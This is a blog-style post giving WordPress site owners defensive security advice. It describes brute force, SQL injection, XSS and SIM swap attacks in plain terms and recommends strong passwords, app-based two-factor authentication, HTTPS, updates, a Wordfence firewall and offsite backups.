Website security is a difficult subject to discuss because it is very technical. When you don’t think you’ll understand a topic, your brain tends to turn off. You immediately assume you won’t understand it. So, please TURN ON your mind because you CAN understand this subject and you need to understand it, on some level, to protect yourself and your customers.
Most people don’t understand why anyone would WANT to hack their website. The fact is that a website is just a portal intruders use to exploit to meet their goals. They aren’t targeting you personally. Since a website that is not secured is an easy target, these are the first ones they will attack. So, I want you to do your best not to be one of the easy to get.
Here are some of the most common type of attacks.
Brute Force Attacks
Jeff Petters of Varonis says:
“A Brute Force Attack is the equivalent of trying every key on your key ring, and eventually finding the right one.”
Most brute force attacks are carried out by programs, not humans. Therefore, they can generate thousands of tries in a matter of seconds. The primary goal of a brute force attack is to gain Admin access to your website. They can only carry out their secondary goals with Admin access. Here are some of the things you can do to protect against brute force attacks:
- Do NOT use “Admin” as your user name. Some of the other user names you should avoid are “webmaster” and any derivative of your domain name.
- Use a LONG and COMPLEX password. The more complex and lengthy your password is the longer it takes for a brute force attack program to decode.
- Limit login attempts. Most firewall programs will allow you to set the number of attempts. I usually set them at 3. That is enough for a human to realize something is wrong and adjust.
- Use multi-factor authentication (2FA). I recommend you use 2FA with a phone application rather than SMS or Text verification (more about that later).
Another method for brute force attacks is to use user names and passwords from other data breaches. Believe it or not, there are lists of user names and passwords on the “dark web” from data breaches.
- If you have been notified that your credentials are part of a data breach, make sure you change your password as soon as possible.
Plugins are the most likely element to contain vulnerabilities. Plugins can be dangerous as well as helpful, and it is easy to overlook the fact that they can introduce code into your website, which performs actions that aren’t congruent with their description.
“An example of this was flagged recently. Plugin “401 to 303” was found to be injecting ads into sites that were visible to search engines but not visitors. This technique is called ‘cloaking’ and is banned by Google.”
WordPress is a CMS which uses a MySQL database. An SQL injection attacker can go around authentication of a website and retrieve the content of the SQL database. Once they’re in, they can add, modify, and delete records in the database.
According to Acunetix:
SQL Injection attacks are one of the oldest, most prevalent, and most dangerous web application vulnerabilities.
- Make sure you use Captcha on all your forms.
- Turn off database error displays using Firewall software like WPMU Defender.
Developers often use the built-in PHP and scripts error debugging feature, which displays code errors on the front end of your website. It’s useful for active development, but on live sites provides hackers yet another way to find loopholes in your site’s security.
Cross Site Scripting (XSS)
Infosec Institute says:
Security researchers have found this vulnerability in most of the popular websites, including Google, Facebook, Amazon, PayPal, and many others. If you look at the bug bounty program closely, most of the reported issues belong to XSS.
XSS can happen anywhere in an application where user input has been taken but not properly encoded. Search fields are an example.
- The best way to protect from this is to install Wordfence.
- You should also be careful when selecting plugins for your website.
Use HTTPS for your website
Emily Schechter, Product Manager on the Chrome Security team, says:
“If you type HTTPS://google.com into web browser you can be sure you are talking the real Google.com, not a fake Google.com. It also means that no attacker on the network can see or modify any of the traffic.”
Let’s Encrypt makes it very easy to install and keep up a free security certificate.
Update your software
Updating your software should be #1 on your list of things to do. Most of the software update packages are meant to fix software bugs that open your website to vulnerability. Make sure your plugins, WordPress version, and PHP software is up-to-date. I use WPMU Automate software to auto-update all plugins and WordPress on the websites I maintain.
Install a Firewall
The most popular WordPress firewall, with over 100 million downloads.
Wordfence includes an endpoint firewall and malware scanner. They keep up with the newest firewall rules, malware signatures, and malicious IP addresses. There is a free and a paid version. The most significant difference is that the paid version gives priority rollouts. So, if the team finds a new hack, they will roll out the patch to the paid members and then upgrade the free version in 30 days.
I also recommend that you follow the Wordfence Podcast, Think like a Hacker. It is published every few days, and there is a wealth of information. I have learned a lot by just listening to this podcast. They don’t only discuss website vulnerabilities. They also discuss mobile phone issues and other internet issues.
Episode 12 of Think like a Hacker is an excellent example of this great production. I encourage you to listen or watch.
Backup your website
Ensure that you have a good backup strategy. Back up offsite, in other words, don’t store your backup on your server. It should be an offsite location. I use the premium version of Updraft Plus. It not only allows you to back up to many different offsite locations, but it will also allow you to restore quickly.
Why not SMS or Text Verification?
The SIM Swap Attack is when someone gains the ability to capture your text messages. A cryptocurrency investor is suing his carrier because he claimed that a SIM swap resulted in the theft of $23.8 million-worth of tokens. Don’t think that you are immune just because you don’t use cryptocurrency. I encourage you to read the article by Wired Magazine or listen to Episode 17 of Think like a Hacker.
Wired Magazine says:
“At its most basic level, a SIM swap is when someone convinces your carrier to switch your phone number over to a SIM card they own. They’re not doing it for prank call cover, or to rack up long-distance charges. By diverting your incoming messages, scammers can easily complete the text-based two-factor authentication checks that protect your most sensitive accounts.”
We have covered a lot of information, and I’m sure your mind is reeling, as mine was after a month of research on this subject. If you have more questions or would like to chat more about these topics I hope you’ll come to see me at Barnes & Noble, Fridays at noon.